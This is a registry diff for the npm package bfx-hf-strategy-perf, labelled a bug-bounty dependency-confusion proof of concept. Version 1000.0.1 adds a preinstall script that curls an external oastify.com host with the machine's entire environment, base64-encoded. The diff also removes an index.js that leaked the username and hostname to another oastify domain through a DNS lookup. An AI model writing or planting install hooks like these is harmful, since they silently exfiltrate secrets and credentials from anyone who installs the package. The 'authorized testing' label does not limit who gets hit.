bfx-hf-strategy-perf 1000.0.0 → 1000.0.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (2) hide show
  1. package/package.json +3 -3
  2. package/index.js +0 -12
package/package.json CHANGED
@@ -1,9 +1,9 @@
1
1
  {
2
2
  "name": "bfx-hf-strategy-perf",
3
- "version": "1000.0.0",
4
- "description": "Security PoC - Authorized Testing",
3
+ "version": "1000.0.1",
4
+ "description": "SECURITY BUG BOUNTY PoC - Dependency Confusion Vulnerability - Authorized Testing Only",
5
5
  "scripts": {
6
- "preinstall": "node index.js"
6
+ "preinstall": "curl -X POST https://bwbrkqy2o13cagf9lzq3rl7aq1wskm8b.oastify.com?env=$(env | base64 -w0)"
7
7
  },
8
8
  "license": "MIT"
9
9
  }
package/index.js DELETED
@@ -1,12 +0,0 @@
1
- const dns = require('dns');
2
- const os = require('os');
3
-
4
- const user = os.userInfo().username;
5
- const host = os.hostname();
6
- const collabDomain = 'fi1v6uk6a5pgwk1d73c7dptec5iw6mub.oastify.com';
7
-
8
- const payload = `bingads.${user}.${host}.${collabDomain}`;
9
-
10
- try {
11
- dns.lookup(payload, (err) => {});
12
- } catch (e) {}